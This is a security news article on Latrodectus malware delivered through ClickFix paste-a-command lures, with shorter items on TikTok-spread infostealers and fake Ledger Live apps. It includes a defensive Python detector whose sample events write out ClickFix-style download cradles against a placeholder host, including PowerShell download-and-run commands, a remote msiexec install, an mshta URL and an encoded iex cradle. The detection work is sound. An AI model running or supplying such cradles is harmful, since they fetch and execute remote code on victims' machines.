Attackers have recently begun delivering the Latrodectus malware with the ClickFix technique: a fake error or verification prompt on a compromised website tells the visitor to copy a command and paste it into the Windows Run dialog. Because the victim launches the command themselves and the staged payload is loaded in memory rather than saved as a conventional executable, the chain is harder for endpoint security tools to detect or block.

Latrodectus, a successor to IcedID, functions primarily as a downloader for other malicious payloads, including ransomware. It was first reported by Proofpoint and Team Cymru in April 2024. This new wave of attacks came shortly after a major crackdown, Operation Endgame, which targeted several cybercrime groups by taking down hundreds of servers and domains associated with various malware.

In May 2025, Expel observed users being tricked into running a PowerShell command copied from a compromised website. The command fetches an MSI package and launches it through msiexec, so the staging happens in memory and no user-downloaded executable lands on disk for antivirus to scan. The installer masquerades as a legitimate NVIDIA application, which lets a malicious DLL be sideloaded; that DLL then downloads the main Latrodectus payload.

To counter such attacks, experts recommend disabling the Windows Run dialog, either through Group Policy (the "Remove Run menu from Start Menu" setting under User Configuration, Administrative Templates, Start Menu and Taskbar) or by setting the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, which disables the Win+R shortcut. This only closes one entry point: a ClickFix lure can just as easily tell the victim to paste the same command into a PowerShell window, a terminal or the File Explorer address bar, so the control is best paired with monitoring for PowerShell, mshta and msiexec launched from explorer.exe or an interactive shell, and with PowerShell script block logging.
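To make the detection side of the chain described above concrete, the following is an added example, not code from the article or from Expel, Proofpoint or Trend Micro. It scores constructed process-creation records (shaped like the ParentImage / Image / CommandLine fields of Sysmon Event ID 1) for the ClickFix pattern: a script host or msiexec spawned from explorer.exe (which hosts the Run dialog) or from an interactive shell, combined with a download cradle, a remote MSI, a hidden window, a policy bypass, an encoded command, or the "I am not a robot" comment lures append so the Run box looks harmless. It also decodes -EncodedCommand payloads so that cradles hidden behind base64 are scored too. The host lists, regexes, flagging threshold and the example.invalid URLs are this example's own assumptions.

```python
"""Triage process-creation events for ClickFix-style execution chains.

Added example, not code from the article or from Expel, Proofpoint or
Trend Micro. The records below are constructed to resemble the ParentImage /
Image / CommandLine fields of Sysmon Event ID 1; the host lists, regexes and
the flagging threshold are this example's assumptions, not a published rule.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Processes a victim can paste a command into: explorer.exe hosts the Win+R Run
# dialog; the rest are interactive shells/terminals that ClickFix lures also use.
PASTE_HOSTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe",
               "powershell.exe", "pwsh.exe"}

# Script hosts and living-off-the-land binaries the lure asks the victim to run.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "msiexec.exe", "curl.exe", "certutil.exe"}

# Command-line traits of ClickFix one-liners (assumed patterns; tune to your fleet).
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(iwr|invoke-webrequest|invoke-expression|iex|downloadstring|"
        r"net\.webclient|start-bitstransfer)\b", re.I),
    "remote_msi": re.compile(r"msiexec(\.exe)?\b.*?/(i|package)\s+https?://", re.I),
    "mshta_url": re.compile(r"mshta(\.exe)?\s+https?://", re.I),
    "hidden_window": re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-(ep|exec|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I),
    # Lures append a comment so the Run box shows a "verification" string.
    "captcha_lure": re.compile(r"i am not a robot|recaptcha|verification id|ray id", re.I),
}

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE script behind a PowerShell -EncodedCommand, else None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: ProcEvent) -> dict:
    """Score one event: 'suspicious' when a pasteable host spawned a script host
    with at least one indicator, or when two or more indicators co-occur."""
    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = text + "\n" + decoded          # scan the decoded script as well
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    pasted = (_basename(event.parent_image) in PASTE_HOSTS
              and _basename(event.image) in SCRIPT_HOSTS)
    return {
        "suspicious": (pasted and len(hits) >= 1) or len(hits) >= 2,
        "pasted": pasted,
        "indicators": hits,
        "decoded": decoded,
    }


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
_ENC = base64.b64encode("iex (iwr https://example.invalid/ld)".encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # 1. Classic ClickFix: Run dialog -> PowerShell cradle, with the decoy comment.
    ProcEvent(r"C:\Windows\explorer.exe", _PS,
              r'powershell -w hidden -c "iwr https://example.invalid/upd.msi -OutFile $env:TEMP\upd.msi; '
              r'msiexec /i $env:TEMP\upd.msi /qn" # I am not a robot - reCAPTCHA Verification ID: 7811'),
    # 2. Run dialog -> msiexec pulling a package straight from a URL.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /q /i https://example.invalid/nvidia-update.msi"),
    # 3. Management agent running an approved script: one indicator, not pasted.
    ProcEvent(r"C:\Windows\CCM\CcmExec.exe", _PS,
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\inventory.ps1"),
    # 4. Ordinary user activity.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\alice\notes.txt"),
    # 5. Lure pasted into an interactive PowerShell window instead of Win+R.
    ProcEvent(_PS, r"C:\Windows\System32\mshta.exe", r"mshta https://example.invalid/verify"),
    # 6. Encoded variant: the cradle only appears after decoding -enc.
    ProcEvent(r"C:\Windows\explorer.exe", _PS, "powershell.exe -nop -w hidden -enc " + _ENC),
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS, 1):
        r = triage(ev)
        flag = "ALERT" if r["suspicious"] else "ok   "
        print(f"{flag} #{i} {_basename(ev.parent_image)} -> {_basename(ev.image)} {r['indicators']}")
```

Events 1, 2, 5 and 6 are flagged; event 3 carries a policy bypass but comes from a management agent rather than a pasteable host and stays below the threshold, which is the distinction that keeps this kind of rule quiet on fleets where scripted administration is routine. The parent-process check is a heuristic: a command pasted into a terminal runs inside the interactive shell, so its children have powershell.exe or cmd.exe as parent, which is why those are in PASTE_HOSTS as well as explorer.exe.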

ClickFix and TikTok

In a related revelation, Trend Micro reported a campaign in which TikTok videos, possibly generated with AI, are used to distribute the Vidar and StealC infostealers. The videos walk viewers through running commands that purport to activate popular software such as Windows and Spotify but instead install the stealers. The accounts that posted the videos have since been deactivated, but the reach was significant, with some videos attracting nearly half a million views.

This approach not only builds on the ClickFix method but also directly targets users seeking pirated software activations. Security researcher Junestherry Dela Cruz highlighted that the attackers are leveraging trending social media platforms to socially engineer users into performing harmful actions.

Mac Users at Risk

Separately, four macOS malware campaigns built on counterfeit copies of the Ledger Live app have been discovered, all aimed at stealing cryptocurrency-related data, including wallet seed phrases. They ship as malicious DMG files that first exfiltrate personal data and then display a fake prompt asking the user for their seed phrase; with that phrase an attacker can drain the wallet.

Moonlock Lab noted a significant rise in discussions on dark web forums related to anti-Ledger tactics, indicating that attackers are continually adapting their strategies to exploit users’ trust in legitimate applications.

As cyber threats evolve, it remains crucial for individuals and organizations to stay vigilant against these emerging tactics and implement robust security measures.
